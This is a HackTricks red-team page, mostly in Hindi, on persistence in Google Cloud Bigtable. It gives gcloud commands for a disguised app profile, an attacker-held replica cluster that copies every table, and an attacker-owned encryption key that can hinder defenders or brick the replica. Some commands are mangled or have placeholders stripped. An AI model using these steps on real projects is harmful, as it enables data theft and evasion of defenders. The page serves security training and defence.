GCP - Bigtable Persistence

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Bigtable

Bigtable के बारे में अधिक जानकारी के लिए देखें:

GCP - Bigtable Enum

Dedicated attacker App Profile

अनुमतियाँ: bigtable.appProfiles.create, bigtable.appProfiles.update.

ऐसा एक app profile बनाएं जो ट्रैफ़िक को आपकी replica cluster की ओर रूट करे और Data Boost सक्षम करें ताकि आप उन provisioned nodes पर कभी निर्भर न रहें जिन्हें defenders नोटिस कर सकते हैं।

Create stealth app profile ```bash gcloud bigtable app-profiles create stealth-profile \ --instance= --route-any --restrict-to= \ --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile
–instance= –data-boost
–data-boost-compute-billing-owner=HOST_PAYS

</details>

जब तक यह प्रोफ़ाइल मौजूद है, आप इसे संदर्भित करने वाले नए क्रेडेंशियल्स का उपयोग करके पुनः कनेक्ट कर सकते हैं।

### अपना स्वयं का रिप्लिका क्लस्टर बनाए रखें

**अनुमतियाँ:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.

एक शांत क्षेत्र में न्यूनतम node-count क्लस्टर प्रोविजन करें। भले ही आपकी क्लाइंट पहचानें गायब हो जाएँ, **क्लस्टर प्रत्येक टेबल की पूरी कॉपी रखता है** जब तक रक्षकों द्वारा इसे स्पष्ट रूप से न हटाया जाए।

<details>

<summary>रिप्लिका क्लस्टर बनाएँ</summary>
```bash
gcloud bigtable clusters create dark-clone \
--instance=<instance-id> --zone=us-west4-b --num-nodes=1

इस पर नज़र रखें gcloud bigtable clusters describe dark-clone --instance=<instance-id> के माध्यम से ताकि आप डेटा खींचने की आवश्यकता होने पर तुरंत स्केल कर सकें।

अपनी खुद की CMEK के पीछे replication को लॉक करें

अनुमतियाँ: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt attacker-owned key पर।

क्लोन बनाते समय अपना KMS key लाएँ। उस key के बिना, Google क्लस्टर को re-create या fail over नहीं कर सकता, इसलिए blue teams को उससे छेड़छाड़ करने से पहले आपके साथ समन्वय करना होगा।

CMEK-प्रोटेक्टेड cluster बनाएं ```bash gcloud bigtable clusters create cmek-clone \ --instance= --zone=us-east4-b --num-nodes=1 \ --kms-key=projects//locations//keyRings//cryptoKeys/ ```

अपने प्रोजेक्ट में कुंजी को रोटेट करें या निष्क्रिय कर दें ताकि आप तुरंत replica को brick कर सकें (फिर भी बाद में उसे वापस चालू करने की अनुमति देते हुए)।

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें